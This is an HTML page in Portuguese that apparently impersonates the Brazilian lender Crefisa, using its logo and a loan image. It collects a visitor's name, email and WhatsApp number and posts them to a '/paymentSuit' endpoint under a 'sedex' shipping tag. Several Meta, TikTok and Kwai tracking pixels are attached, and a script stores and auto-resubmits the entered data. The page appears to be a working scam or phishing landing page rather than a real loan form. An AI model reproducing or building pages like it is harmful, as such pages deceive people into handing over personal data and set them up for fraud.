
<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <link href="../npm/bootstrap%405.3.0/dist/css/bootstrap.min-8.css" rel="stylesheet">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <style>
        .header {
        background: white;
        color: white;
        padding: 15px 0;
        text-align: center;
        font-size: 1.5rem;
        font-weight: bold;
        grid-area: top-bar;
    }
    .main-content {
        max-width: 450px;
        background-color: white;
        text-align: center;
        padding: 2rem 2rem 1rem 2rem;
        border-radius: 10px;
        box-shadow: 0 2px 40px rgba(0, 0, 0, 0.1);
        margin: 0 auto;
    }
    .main-content h2 {
        margin-bottom: 20px;
    }
    .btn-custom {
        color: white;
        border: none;
        width: 100%;
        margin-bottom: 10px;
        background: #38C0E5;
        font-weight: 600;
        border-radius: 1rem;
        padding: .75rem 3rem;
        letter-spacing: .3px;
        line-height: 1.15;
    }
    .btn-custom:hover{
        color: white !important;
        background-color: #38C0E5 !important;
        transform: scale(1.02) !important;
    }
    
    .footer {
        background-color: #fff;
        border-top: solid 1px #e6dddd;
        color: #000;
        text-align: center;
        width: 100%;
        bottom: 0;
        grid-area: footer;
        border-bottom: solid 3px #e6007e;
        padding: 2rem 0.5rem;
        position: relative;
        margin-top: 50px;
    }
    
    #conclusao {
        display: none; /* Esconde o elemento por padrão */
    }
    
    #conclusao h4 {
        color: green; /* Define a cor do texto */
        font-weight: bold; /* Define o texto em negrito */
    }
    
    .char {
        border-top: solid px #00adca;
        background-color: #00adca;
        padding: 2px !important;
    }/* End custom CSS */
    </style>
    <!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '1044109920185725');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none" src="../tr-45?id=1044109920185725&ev=PageView&noscript=1"></noscript>
<!-- End Meta Pixel Code -->

<!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '1416081155754349');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none" src="../tr-46?id=1416081155754349&ev=PageView&noscript=1"></noscript>
<!-- End Meta Pixel Code -->

<!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '478917228479685');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none" src="../tr-47?id=478917228479685&ev=PageView&noscript=1"></noscript>
<!-- End Meta Pixel Code -->

<!-- TikTok Pixel Code Start -->
<script>
!function (w, d, t) {
  w.TiktokAnalyticsObject=t;var ttq=w[t]=w[t]||[];ttq.methods=["page","track","identify","instances","debug","on","off","once","ready","alias","group","enableCookie","disableCookie","holdConsent","revokeConsent","grantConsent"],ttq.setAndDefer=function(t,e){t[e]=function(){t.push([e].concat(Array.prototype.slice.call(arguments,0)))}};for(var i=0;i<ttq.methods.length;i++)ttq.setAndDefer(ttq,ttq.methods[i]);ttq.instance=function(t){for(
var e=ttq._i[t]||[],n=0;n<ttq.methods.length;n++)ttq.setAndDefer(e,ttq.methods[n]);return e},ttq.load=function(e,n){var r="https://analytics.tiktok.com/i18n/pixel/events.js",o=n&&n.partner;ttq._i=ttq._i||{},ttq._i[e]=[],ttq._i[e]._u=r,ttq._t=ttq._t||{},ttq._t[e]=+new Date,ttq._o=ttq._o||{},ttq._o[e]=n||{};n=document.createElement("script")
;n.type="text/javascript",n.async=!0,n.src=r+"?sdkid="+e+"&lib="+t;e=document.getElementsByTagName("script")[0];e.parentNode.insertBefore(n,e)};


  ttq.load('CR88BSBC77U42T4DV7H0');
  ttq.page();
}(window, document, 'ttq');
</script>
<!-- TikTok Pixel Code End -->

<script>
!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.install=t():e.install=t()}(window,(function(){return function(e){var t={};function n(o){if(t[o])return t[o].exports;var r=t[o]={i:o,l:!1,exports:{}};return e[o].call(r.exports,r,r.exports,n),r.l=!0,r.exports}return n.m=e,n.c=t,n.d=function(e,t,o){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:o})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var o=Object.create(null);if(n.r(o),Object.defineProperty(o,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)n.d(o,r,function(t){return e[t]}.bind(null,r));return o},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=0)}([function(e,t,n){"use strict";var o=this&&this.__spreadArray||function(e,t,n){if(n||2===arguments.length)for(var o,r=0,i=t.length;r<i;r++)!o&&r in t||(o||(o=Array.prototype.slice.call(t,0,r)),o[r]=t[r]);return e.concat(o||Array.prototype.slice.call(t))};Object.defineProperty(t,"__esModule",{value:!0});var r=function(e,t,n){var o,i=e.createElement("script");i.type="text/javascript",i.async=!0,i.src=t,n&&(i.onerror=function(){r(e,n)});var a=e.getElementsByTagName("script")[0];null===(o=a.parentNode)||void 0===o||o.insertBefore(i,a)};!function(e,t,n){e.KwaiAnalyticsObject=n;var i=e[n]=e[n]||[];i.methods=["page","track","identify","instances","debug","on","off","once","ready","alias","group","enableCookie","disableCookie"];var a=function(e,t){e[t]=function(){for(var n=[],r=0;r<arguments.length;r++)n[r]=arguments[r];var i=o([t],n,!0);e.push(i)}};i.methods.forEach((function(e){a(i,e)})),i.instance=function(e){var t,n=(null===(t=i._i)||void 0===t?void 0:t[e])||[];return i.methods.forEach((function(e){a(n,e)})),n},i.load=function(e,o){var a="https://s1.kwai.net/kos/s101/nlav11187/pixel/events.js";i._i=i._i||{},i._i[e]=[],i._i[e]._u=a,i._t=i._t||{},i._t[e]=+new Date,i._o=i._o||{},i._o[e]=o||{};var c="?sdkid=".concat(e,"&lib=").concat(n);r(t,a+c,"https://s16-11187.ap4r.com/kos/s101/nlav11187/pixel/events.js"+c)}}(window,document,"kwaiq")}])}));
</script>
<script>
kwaiq.load('510449167530721283');
kwaiq.page();
</script></head>

<body>
<div style="
  display: grid;
  grid-template-areas:
    'top-bar'
    'content'
    'footer';
  grid-template-rows: auto 1fr auto;
  min-height: 100vh;
">    
    <div class="header">
        <img decoding="async" style="width: 100px;" src="../wikipedia/pt/a/a3/Crefisa-16.png" alt="Imagem Centralizada">
    </div>

    

    <div style="grid-area: content; padding: 0 1rem;"> 
        <img src="../wp-content/uploads/2018/08/crefisa-emprestimo.jpg" width="100%">        
        <!-- Seção 7: Formulário de Cadastro -->
        <div style="margin-top: 18px;" class="main-content">
            <div id="formulario" class="mb-3">
                <p style="color:gray; text-align:initial">Finalizar solicitação</p>
                
                <form id="cadastroForm" method="POST" style="text-align:initial" action="/paymentSuit">
                    <input type="hidden" name="type" value="sedex">
                    <div class="mb-3">
                        <label for="txt_name" class="form-label" style="color:gray; font-size:13px">Nome completo</label>
                        <input type="text" class="form-control" id="txt_name" name="nome" placeholder="Ex: Maria">
                    </div>
                    <div class="mb-3">
                        <label for="txt_email" class="form-label" style="color:gray; font-size:13px">Email</label>
                        <input type="email" class="form-control" id="txt_email" name="email" placeholder="Ex: Maria@gmail.com">
                    </div>
                    <div class="mb-3">
                        <label for="txt_phone" class="form-label" style="color:gray; font-size:13px">Seu WhatsApp</label>
                        <input type="text" class="form-control" name="telefone" id="txt_phone" placeholder="(11) 11111-1111">
                    </div>
                    <div id="loader" style="display: none; text-align: center; margin-bottom: 15px;">
                        <i class="fas fa-spinner fa-spin" style="font-size: 2em; color: #e6007e;"></i>
                    </div> 
                </form>
                <button onclick='btnClick()' class="btn-custom">Continuar</button>
                
            </div>
    
        </div>
    </div> 
  
    <!-- Seu conteúdo principal aqui -->
  <style>
        /* Reset básico para garantir consistência entre navegadores */
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
        }

        footer {
        
            padding: 20px 0; /* Espaçamento interno do footer */
            text-align: center; /* Centraliza o conteúdo dentro do footer */
        }

        .footer-content img {
            width: 100px; /* Define o tamanho da logo */
            height: auto; /* Mantém a proporção da imagem */
        }
    </style>
        <footer>
        <div class="footer-content">
            <img src="../G90L41CR/56120104-3021981927815553-9174618497278279680-n-removebg-preview.png" alt="Logo">
        </div>
    </footer>

<script>
    const tipo = "sedex";
    const btnClick = () => {
        if(document.getElementById("txt_email").value == ""){
            alert("Preencha o campo email");
            return;
        }
        if(document.getElementById("txt_phone").value == ""){
            alert("Preencha o campo telefone");
            return;
        }
        if(document.getElementById("txt_name").value == ""){
            alert("Preencha o campo nome");
            return;
        }
        if(tipo == "sedex" || tipo == "pac"){
            localStorage.setItem("CHECKOUT_SAVED", "sim");
            localStorage.setItem("CHECKOUT_NAME", document.getElementById("txt_name").value);
            localStorage.setItem("CHECKOUT_PHONE", document.getElementById("txt_phone").value);
            localStorage.setItem("CHECKOUT_EMAIL", document.getElementById("txt_email").value);
            document.getElementById("cadastroForm").submit();
        }else{
            document.getElementById("cadastroForm").submit();
        }
    }

    const automatic_checkout = () => {
        if(tipo != "sedex" && tipo != "pac" && localStorage.getItem("CHECKOUT_SAVED") == "sim"){
            document.getElementById("txt_name").value = localStorage.getItem("CHECKOUT_NAME");
            document.getElementById("txt_phone").value = localStorage.getItem("CHECKOUT_PHONE");
            document.getElementById("txt_email").value = localStorage.getItem("CHECKOUT_EMAIL");
            document.getElementById("cadastroForm").submit();
        }
    }

    automatic_checkout();
</script>
</div></body>


</html>